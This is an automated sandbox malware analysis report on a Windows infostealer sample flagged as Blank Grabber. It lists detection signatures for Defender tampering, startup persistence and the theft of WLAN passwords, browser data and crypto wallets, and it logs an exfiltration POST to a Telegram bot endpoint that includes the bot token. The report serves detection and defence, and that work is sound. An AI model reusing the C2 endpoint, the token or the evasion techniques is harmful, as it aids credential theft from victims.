Windows Analysis Report
#U202f#U202f#U2005#U00a0.scr.exe

Overview

General Information

Sample name: #U202f#U202f#U2005#U00a0.scr.exe
renamed because original name is a hash value
Original sample name: .scr.exe
Analysis ID: 1487425
MD5: d87b402b821fa842d89283aa8654d9c0
SHA1: 30c086651e1bcd191163c01efbab55f51ec04691
SHA256: 791a66abbd58ac34dc72565455fb6e596bb14b93aa5b0109e0d53c60b87b5678
Tags: exe
Infos:

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (RTLO)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Very long command line found
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: #U202f#U202f#U2005#U00a0.scr.exe Avira: detected
Source: #U202f#U202f#U2005#U00a0.scr.exe ReversingLabs: Detection: 71%
Source: #U202f#U202f#U2005#U00a0.scr.exe Virustotal: Detection: 72% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: #U202f#U202f#U2005#U00a0.scr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 68_2_00007FF7F7E9901C
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdb source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342094311.00007FF8B9071000.00000040.00000001.01000000.00000007.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340877451.00007FF8B8CB1000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343290926.00007FF8B9F61000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdbhPu source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342474030.00007FF8B93C1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.2208106332.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp, rar.exe, 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343092804.00007FF8B9841000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341828225.00007FF8B9061000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341133552.00007FF8B8CD1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340532745.00007FF8B8B11000.00000040.00000001.01000000.0000000F.sdmp
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE188D0 FindFirstFileExW,FindClose, 0_2_00007FF73AE188D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE31EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF73AE31EE4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EA46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 68_2_00007FF7F7EA46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EE88E0 FindFirstFileExA, 68_2_00007FF7F7EE88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 68_2_00007FF7F7E9E21C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\ Jump to behavior

Networking

barindex
Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 692816User-Agent: python-urllib3/2.1.0Content-Type: multipart/form-data; boundary=6d93bc963fb1d0e6724c699c271a2303
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digi
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.co
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 